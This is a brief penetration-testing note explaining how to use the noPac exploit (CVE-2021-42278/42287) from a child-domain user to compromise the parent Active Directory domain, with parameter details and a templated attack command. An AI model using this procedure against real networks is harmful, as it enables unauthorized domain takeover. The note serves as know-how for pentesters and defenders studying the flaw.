sAMAccountName Spoofing in the Forest
Exploiting sAMAccountName spoofing (CVE-2021-42278 & CVE-2021-42287) from the child domain can led to compromise the parent domain
Parent domain can be compromised from a user of the child domain using the
noPac.exe(sAMAccountName spoofing exploit) is written by cube0x0. I notice that he didn't refer example command to compromise the parent domain.
unsafe.local = parent domain
gotham.unsafe.local = child domain
user1 = user of the gotham domain
For above scenario, you must set
-dcparameter as a domain controller of the parent domain without specifying
-domainparameter because if you specify a parent domain name with the credentials of a child domain user, invalid credentials error occurs in the
If you specify the child domain name, a machine account will be added to
gotham.unsafe.localby the noPac exploit and it fails our objective. So
NetworkCredential.argDomainshould be empty. Username and password are enough to connect parent DC successfully. (trust relations) We can see this adding line 399.
The domain name that is required for adding a machine will be extracted from the specified DC name (line 421).
noPac.exe -user [child-user] -pass [pass] -dc [parent-dc] -mAccount [machine-name] -mPassword [machine-pass] -service cifs -ptt
Last modified 1yr ago